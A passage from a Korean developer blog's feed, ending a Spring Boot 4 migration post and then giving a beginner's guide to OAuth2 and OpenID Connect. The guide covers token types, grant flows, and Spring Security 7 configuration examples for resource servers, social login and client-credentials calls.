버전업이 아닙니다. <strong>Java 생태계 전체의 현대화</strong> 과정이죠:</p> <ul> <li>Java EE → Jakarta EE로의 전환</li> <li>오래된 코드 제거 (SecurityManager 등)</li> <li>최신 Java 기능 활용 (Java 17+, 가상 스레드)</li> <li>성능 개선 (ByteBuffer, 비동기 I/O)</li> <li>데이터 접근 계층 현대화 (Hibernate 7.0, JPA 3.2)</li> <li>운영 가시성 향상 (Observability 강화)</li> </ul> <p><strong>핵심 요약:</strong></p> <ul> <li>Spring Boot 4 = Spring Framework 7 + Servlet 6.1 + Jakarta EE 11</li> <li>Java 17 최소, Java 21 권장 (가상 스레드 활용)</li> <li>Hibernate 7.0 전환으로 JPA 레이어 개선</li> <li>더 빠르고, 더 안정적이며, 더 관찰 가능한 애플리케이션 구축 가능</li> </ul> <p>프로덕션 환경에 적용하기 전에는 충분한 테스트와 성능 검증을 거치시길 권장합니다. Spring 공식 문서와 마이그레이션 가이드를 참고하면 더 원활한 전환이 가능할 것입니다. 🚀</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Tue, 06 Jan 2026 13:00:00 +0900 http://thecodinglog.github.io/spring/spring-boot/2026/01/06/spring-boot4-servlet6.html http://thecodinglog.github.io/spring/spring-boot/2026/01/06/spring-boot4-servlet6.html Spring Boot Servlet Servlet6.1 Spring Spring-boot OAuth2 쉽게 이해하기 - 초보자를 위한 쉬운 가이드 <h1 id="-시작하기-전에-인증-vs-인가">🎯 시작하기 전에: 인증 vs 인가</h1> <p>보안을 이해하려면 먼저 이 두 개념을 구분해야 합니다.</p> <h3 id="인증-authentication---너-누구야">인증 (Authentication) - “너 누구야?”</h3> <p>아파트 출입문에서 <strong>주민등록증을 확인</strong>하는 것과 같습니다.</p> <ul> <li>“당신이 정말 김철수가 맞나요?”</li> <li>로그인할 때 아이디/비밀번호를 입력하는 과정</li> </ul> <h3 id="인가-authorization---이거-해도-돼">인가 (Authorization) - “이거 해도 돼?”</h3> <p>아파트 입주민이라고 <strong>모든 집에 들어갈 수 있는 건 아니죠.</strong></p> <ul> <li>“당신은 303호만 출입 가능합니다”</li> <li>로그인 후 특정 기능이나 데이터에 접근할 권한이 있는지 확인</li> </ul> <blockquote> <p><strong>핵심:</strong> OAuth2는 원래 <strong>인가(권한 위임)</strong>를 위한 도구입니다. 하지만 OpenID Connect를 더하면 <strong>인증(로그인)</strong>도 할 수 있습니다.</p> </blockquote> <hr /> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <hr /> <h1 id="-이야기로-이해하는-oauth2">📖 이야기로 이해하는 OAuth2</h1> <h3 id="상황-당신이-사진-인쇄-서비스를-이용하려고-합니다">상황: 당신이 사진 인쇄 서비스를 이용하려고 합니다</h3> <p><strong>옛날 방식 (문제 많음):</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>인쇄 서비스: "구글 포토에서 사진 가져올게요. 구글 아이디랑 비밀번호 알려주세요!" 당신: "아... 여기에 내 구글 비밀번호를 줘야 하나?" 😰 </code></pre></div></div> <p><strong>문제점:</strong></p> <ul> <li>인쇄 서비스가 내 구글 계정을 마음대로 쓸 수 있어요</li> <li>비밀번호를 바꾸기 전까지 계속 접근 가능해요</li> <li>사진만 보면 되는데 이메일, 캘린더까지 다 볼 수 있어요</li> </ul> <p><strong>OAuth2 방식 (똑똑함):</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>인쇄 서비스: "구글에 로그인해서 '사진만 볼 수 있는 허가증'을 받아올게요" 당신: 구글 로그인 → "이 앱이 내 사진만 보도록 허락할래요?" 클릭 구글: "여기 임시 출입증(토큰)이요. 사진 폴더만 볼 수 있어요" </code></pre></div></div> <p><strong>장점:</strong></p> <ul> <li>비밀번호를 알려주지 않아요</li> <li>사진만 볼 수 있도록 권한을 제한해요</li> <li>언제든지 허가를 취소할 수 있어요</li> </ul> <hr /> <h1 id="️-oauth2의-4명의-등장인물">🏗️ OAuth2의 4명의 등장인물</h1> <p>실제 서비스에서 이 4명이 어떻게 협력하는지 봅시다.</p> <h3 id="1-resource-owner-자원-소유자---당신">1. Resource Owner (자원 소유자) - <strong>당신</strong></h3> <ul> <li>구글 포토에 있는 사진의 주인</li> <li>권한을 줄지 말지 결정하는 사람</li> </ul> <h3 id="2-client-클라이언트---인쇄-서비스">2. Client (클라이언트) - <strong>인쇄 서비스</strong></h3> <ul> <li>당신의 사진을 가져오고 싶은 앱</li> <li>당신 대신 구글에 접근하려는 애플리케이션</li> </ul> <h3 id="3-authorization-server-인가-서버---구글-로그인-서버">3. Authorization Server (인가 서버) - <strong>구글 로그인 서버</strong></h3> <ul> <li>당신이 정말 구글 계정 주인인지 확인</li> <li>“사진 폴더 읽기 권한”이 담긴 토큰을 발급</li> </ul> <h3 id="4-resource-server-자원-서버---구글-포토-api">4. Resource Server (자원 서버) - <strong>구글 포토 API</strong></h3> <ul> <li>실제 사진이 저장된 곳</li> <li>토큰을 확인하고 사진을 제공</li> </ul> <hr /> <h1 id="-토큰의-종류">🎫 토큰의 종류</h1> <h3 id="access-token---출입증">Access Token - “출입증”</h3> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"이 토큰을 가진 사람은 사진 폴더를 30일간 읽을 수 있습니다" </code></pre></div></div> <ul> <li>API를 호출할 때 사용</li> <li>유효기간이 있음 (보통 1시간 ~ 1일)</li> <li><strong>Bearer Token 방식:</strong> 가진 사람이 곧 권한자</li> </ul> <p><strong>실제 사용 예시:</strong></p> <div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">GET /photos/album1 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... </span></code></pre></div></div> <h3 id="id-token---신분증-oidc에서만">ID Token - “신분증” (OIDC에서만)</h3> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"이 사람은 user@gmail.com이고, 이름은 김철수입니다" </code></pre></div></div> <ul> <li>로그인한 사용자가 누구인지 알려줌</li> <li>API 호출에는 사용하지 않음</li> <li>클라이언트가 사용자 정보를 확인할 때만 사용</li> </ul> <h3 id="refresh-token---재발급권">Refresh Token - “재발급권”</h3> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"출입증이 만료되면 이걸로 새 출입증을 받으세요" </code></pre></div></div> <ul> <li>Access Token이 만료되면 새로 받을 때 사용</li> <li>유효기간이 매우 김 (보통 30일 ~ 1년)</li> <li>안전하게 보관해야 함</li> </ul> <hr /> <h1 id="-토큰의-형식">🔑 토큰의 형식</h1> <h3 id="jwt-json-web-token---자가-검증-가능한-토큰">JWT (JSON Web Token) - “자가 검증 가능한 토큰”</h3> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>eyJhbGci.eyJzdWIi.SflKxwRJ ↑헤더 ↑내용 ↑서명 </code></pre></div></div> <p><strong>특징:</strong></p> <ul> <li>토큰 안에 정보가 모두 들어있어요</li> <li>서버가 DB 조회 없이 바로 검증 가능</li> <li>빠르고 효율적</li> </ul> <p><strong>예시 내용:</strong></p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"sub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"user123"</span><span class="p">,</span><span class="w"> </span><span class="nl">"scope"</span><span class="p">:</span><span class="w"> </span><span class="s2">"photos:read"</span><span class="p">,</span><span class="w"> </span><span class="nl">"exp"</span><span class="p">:</span><span class="w"> </span><span class="mi">1735905600</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p><strong>장점:</strong> ⚡ 빠름, 서버 부담 적음<br /> <strong>단점:</strong> ❌ 한 번 발급하면 취소하기 어려움</p> <h3 id="opaque-token---불투명한-토큰">Opaque Token - “불투명한 토큰”</h3> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>d4f9a8b3c2e1 (의미 없는 랜덤 문자열) </code></pre></div></div> <p><strong>특징:</strong></p> <ul> <li>토큰만 봐서는 아무것도 모름</li> <li>매번 서버에 “이 토큰 유효해?” 물어봐야 함(물어보는 과정을 <strong>‘Introspection’</strong>이라고 불러요)</li> <li>즉시 취소 가능</li> </ul> <p><strong>장점:</strong> 🔒 보안성 높음, 즉시 취소 가능<br /> <strong>단점:</strong> 🐌 느림, 서버 부담 증가</p> <hr /> <h1 id="-토큰-받는-방법-grant-types">🔄 토큰 받는 방법 (Grant Types)</h1> <h3 id="1-authorization-code---사용자-로그인-방식">1. Authorization Code - “사용자 로그인 방식”</h3> <p><strong>언제 사용:</strong> 웹사이트, 모바일 앱에서 사용자 로그인</p> <p><strong>과정:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. 사용자: "구글로 로그인" 버튼 클릭 2. 구글: "이 앱이 사진 보는 거 허락할래?" 물어봄 3. 사용자: "허락" 클릭 4. 구글: 임시 코드 발급 → 앱으로 전달 5. 앱: 코드를 토큰으로 교환 (서버끼리 비밀 통신) </code></pre></div></div> <p><strong>가장 안전한 방식</strong>이고, <strong>OIDC 로그인에서 표준</strong>입니다.</p> <blockquote> <p>최근에는 보안 강화를 위해 Authorization Code 방식에 PKCE라는 보안 장치를 더하는 것이 표준(OAuth 2.1)입니다. Spring Security는 이를 자동으로 지원합니다.</p> </blockquote> <h3 id="2-client-credentials---서버-간-통신-방식">2. Client Credentials - “서버 간 통신 방식”</h3> <p><strong>언제 사용:</strong> 사용자 없이 서버끼리 통신 (예: 정기 데이터 동기화)</p> <p><strong>과정:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. 백엔드 서버: "나 정식 등록된 앱이야" + 비밀키 제출 2. 인가 서버: "확인했어" + 토큰 발급 3. 백엔드 서버: 토큰으로 API 호출 </code></pre></div></div> <p><strong>특징:</strong></p> <ul> <li>사용자 로그인 없음</li> <li>ID Token 없음 (사용자가 없으니까)</li> <li>Access Token만 받음</li> </ul> <hr /> <h1 id="-openid-connect-oidc">🌐 OpenID Connect (OIDC)</h1> <h3 id="oauth2의-한계">OAuth2의 한계</h3> <p>OAuth2만으로는 <strong>“이 사용자가 누구인지”</strong> 표준적으로 알 수 없었습니다.</p> <h3 id="oidc--oauth2--로그인">OIDC = OAuth2 + 로그인</h3> <table> <thead> <tr> <th>기능</th> <th>OAuth2</th> <th>OIDC</th> </tr> </thead> <tbody> <tr> <td>목적</td> <td>권한 위임</td> <td>로그인 + 권한 위임</td> </tr> <tr> <td>토큰</td> <td>Access Token</td> <td>Access Token + <strong>ID Token</strong></td> </tr> <tr> <td>사용자 정보</td> <td>별도 API 호출</td> <td>ID Token에 포함</td> </tr> </tbody> </table> <p><strong>OIDC 사용 예:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"구글로 로그인" = OAuth2 + OIDC → Access Token (구글 API 호출용) → ID Token (사용자 정보: 이메일, 이름) </code></pre></div></div> <hr /> <h1 id="-spring-security-7으로-구현하기">💻 Spring Security 7으로 구현하기</h1> <h3 id="1-resource-server-내-api-보호">1. Resource Server (내 API 보호)</h3> <p><strong>상황:</strong> 내가 만든 API를 토큰으로 보호하고 싶어요.</p> <p><strong>설정 (application.yml):</strong></p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spring</span><span class="pi">:</span> <span class="na">security</span><span class="pi">:</span> <span class="na">oauth2</span><span class="pi">:</span> <span class="na">resourceserver</span><span class="pi">:</span> <span class="na">jwt</span><span class="pi">:</span> <span class="na">issuer-uri</span><span class="pi">:</span> <span class="s">https://auth.mycompany.com</span> </code></pre></div></div> <p><strong>Spring Security 설정:</strong></p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">filterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">(</span><span class="n">auth</span> <span class="o">-&gt;</span> <span class="n">auth</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="s">"/public/**"</span><span class="o">).</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">oauth2ResourceServer</span><span class="o">(</span><span class="n">oauth2</span> <span class="o">-&gt;</span> <span class="n">oauth2</span> <span class="o">.</span><span class="na">jwt</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p><strong>동작:</strong></p> <ol> <li>클라이언트가 API 호출 시 토큰을 헤더에 넣어 보냄</li> <li>Spring Security가 자동으로 토큰 검증</li> <li>유효하면 요청 처리, 아니면 401 에러</li> </ol> <h3 id="2-oauth2-login-소셜-로그인">2. OAuth2 Login (소셜 로그인)</h3> <p><strong>상황:</strong> 내 서비스에 “구글로 로그인” 버튼을 넣고 싶어요.</p> <p><strong>설정 (application.yml):</strong></p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spring</span><span class="pi">:</span> <span class="na">security</span><span class="pi">:</span> <span class="na">oauth2</span><span class="pi">:</span> <span class="na">client</span><span class="pi">:</span> <span class="na">registration</span><span class="pi">:</span> <span class="na">google</span><span class="pi">:</span> <span class="na">client-id</span><span class="pi">:</span> <span class="s">your-client-id</span> <span class="na">client-secret</span><span class="pi">:</span> <span class="s">your-secret</span> <span class="na">scope</span><span class="pi">:</span> <span class="s">openid, profile, email</span> </code></pre></div></div> <p><strong>Spring Security 설정:</strong></p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">filterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">(</span><span class="n">auth</span> <span class="o">-&gt;</span> <span class="n">auth</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="s">"/login"</span><span class="o">).</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">oauth2Login</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p><strong>동작:</strong></p> <ol> <li>사용자가 <code class="language-plaintext highlighter-rouge">/oauth2/authorization/google</code> 접속</li> <li>구글 로그인 페이지로 리다이렉트</li> <li>로그인 후 우리 서비스로 돌아옴</li> <li>Spring Security가 자동으로 세션 생성</li> </ol> <h3 id="3-client-credentials-서버-간-통신">3. Client Credentials (서버 간 통신)</h3> <p><strong>상황:</strong> 내 백엔드 서버에서 다른 회사 API를 주기적으로 호출해야 해요.</p> <p><strong>설정 (application.yml):</strong></p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spring</span><span class="pi">:</span> <span class="na">security</span><span class="pi">:</span> <span class="na">oauth2</span><span class="pi">:</span> <span class="na">client</span><span class="pi">:</span> <span class="na">registration</span><span class="pi">:</span> <span class="na">partner-api</span><span class="pi">:</span> <span class="na">client-id</span><span class="pi">:</span> <span class="s">my-app-id</span> <span class="na">client-secret</span><span class="pi">:</span> <span class="s">my-secret</span> <span class="na">authorization-grant-type</span><span class="pi">:</span> <span class="s">client_credentials</span> <span class="na">scope</span><span class="pi">:</span> <span class="s">api:read</span> <span class="na">provider</span><span class="pi">:</span> <span class="na">partner-api</span><span class="pi">:</span> <span class="na">token-uri</span><span class="pi">:</span> <span class="s">https://partner.com/oauth/token</span> </code></pre></div></div> <p><strong>사용 코드:</strong></p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Service</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">PartnerApiService</span> <span class="o">{</span> <span class="kd">private</span> <span class="kd">final</span> <span class="nc">RestClient</span> <span class="n">restClient</span><span class="o">;</span> <span class="kd">public</span> <span class="nf">PartnerApiService</span><span class="o">(</span><span class="nc">RestClient</span><span class="o">.</span><span class="na">Builder</span> <span class="n">builder</span><span class="o">)</span> <span class="o">{</span> <span class="k">this</span><span class="o">.</span><span class="na">restClient</span> <span class="o">=</span> <span class="n">builder</span> <span class="o">.</span><span class="na">requestInterceptor</span><span class="o">(</span><span class="k">new</span> <span class="nc">OAuth2ClientHttpRequestInterceptor</span><span class="o">())</span> <span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="kd">public</span> <span class="nc">String</span> <span class="nf">getData</span><span class="o">()</span> <span class="o">{</span> <span class="c1">// 토큰이 자동으로 헤더에 추가됨</span> <span class="k">return</span> <span class="n">restClient</span><span class="o">.</span><span class="na">get</span><span class="o">()</span> <span class="o">.</span><span class="na">uri</span><span class="o">(</span><span class="s">"https://partner.com/api/data"</span><span class="o">)</span> <span class="o">.</span><span class="na">retrieve</span><span class="o">()</span> <span class="o">.</span><span class="na">body</span><span class="o">(</span><span class="nc">String</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <hr /> <h1 id="-핵심-정리">🎓 핵심 정리</h1> <h3 id="oauth2-vs-oidc-선택-가이드">OAuth2 vs OIDC 선택 가이드</h3> <table> <thead> <tr> <th>목적</th> <th>사용</th> </tr> </thead> <tbody> <tr> <td>사용자 로그인 기능</td> <td><strong>OIDC</strong> (OAuth2 + openid scope)</td> </tr> <tr> <td>제3자 API 호출 권한</td> <td><strong>OAuth2</strong></td> </tr> <tr> <td>사용자 정보 필요</td> <td><strong>OIDC</strong> (ID Token 사용)</td> </tr> <tr> <td>서버 간 통신</td> <td><strong>OAuth2</strong> (Client Credentials)</td> </tr> </tbody> </table> <h3 id="토큰-선택-가이드">토큰 선택 가이드</h3> <table> <thead> <tr> <th>상황</th> <th>추천</th> </tr> </thead> <tbody> <tr> <td>마이크로서비스 환경</td> <td><strong>JWT</strong> (빠르고 독립적)</td> </tr> <tr> <td>엄격한 보안 필요</td> <td><strong>Opaque Token</strong> (즉시 취소 가능)</td> </tr> <tr> <td>외부 API 연동</td> <td><strong>상대방이 정한 방식 따르기</strong></td> </tr> </tbody> </table> <h3 id="spring-security-7-특징">Spring Security 7 특징</h3> <ol> <li><strong>Bean 중심 설정:</strong> 필요한 기능을 Bean으로 등록하면 자동 감지</li> <li><strong>간소화된 코드:</strong> 기본 설정만으로도 대부분 동작</li> <li><strong>RestClient 지원:</strong> 동기 방식 HTTP 클라이언트 공식 지원</li> </ol> <hr /> <h1 id="-자주-묻는-질문">❓ 자주 묻는 질문</h1> <p><strong>Q: JWT가 탈취당하면 어떻게 하나요?</strong><br /> A: JWT는 만료 전까지 취소가 어렵습니다. 그래서 유효기간을 짧게 (1시간 이하) 설정하고, Refresh Token으로 자주 갱신하는 방식을 사용합니다. JWT 탈취가 걱정된다면, Refresh Token을 한 번만 사용 가능하게 만드는 ‘Refresh Token Rotation’ 기법을 사용하면 더욱 안전합니다.</p> <p><strong>Q: ID Token으로 API를 호출해도 되나요?</strong><br /> A: 안 됩니다. ID Token은 “로그인한 사용자 정보 확인”용입니다. API 호출은 반드시 Access Token을 사용하세요.</p> <p><strong>Q: OAuth2 없이 JWT만 쓰면 안 되나요?</strong><br /> A: 가능하지만, OAuth2를 쓰면 토큰 발급/갱신/취소 등의 표준 방식을 제공받아 더 안전하고 편리합니다.</p> <p><strong>Q: 어떤 Grant Type을 써야 하나요?</strong></p> <ul> <li>웹/모바일 로그인 → <strong>Authorization Code</strong></li> <li>서버 간 통신 → <strong>Client Credentials</strong></li> <li>기타 방식은 보안 이슈가 있어 비추천</li> </ul> <hr /> <h1 id="-마무리">🚀 마무리</h1> <p>OAuth2와 OIDC는 처음엔 복잡해 보이지만, 핵심은 간단합니다:</p> <ol> <li><strong>비밀번호를 직접 주고받지 않기</strong></li> <li><strong>필요한 권한만 제한적으로 주기</strong></li> <li><strong>언제든지 권한을 취소할 수 있게 하기</strong></li> </ol> <p>Spring Security 7은 이 모든 과정을 최대한 자동화해서, 개발자는 비즈니스 로직에만 집중할 수 있게 도와줍니다.</p> <blockquote> <p><strong>시작 팁:</strong> 먼저 Google OAuth2로 로그인 기능을 만들어보세요. <code class="language-plaintext highlighter-rouge">spring-boot-starter-oauth2-client</code>만 추가하고 <code class="language-plaintext highlighter-rouge">client-id</code>와 <code class="language-plaintext highlighter-rouge">client-secret</code>만 설정하면 바로 작동합니다!</p> </blockquote> <hr /> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Mon, 05 Jan 2026 15:00:00 +0900 http://thecodinglog.github.io/spring/security/2026/01/05/easy-oauth2.html http://thecodinglog.github.io/spring/security/2026/01/05/easy-oauth2.html Spring Security OAuth2 Spring Security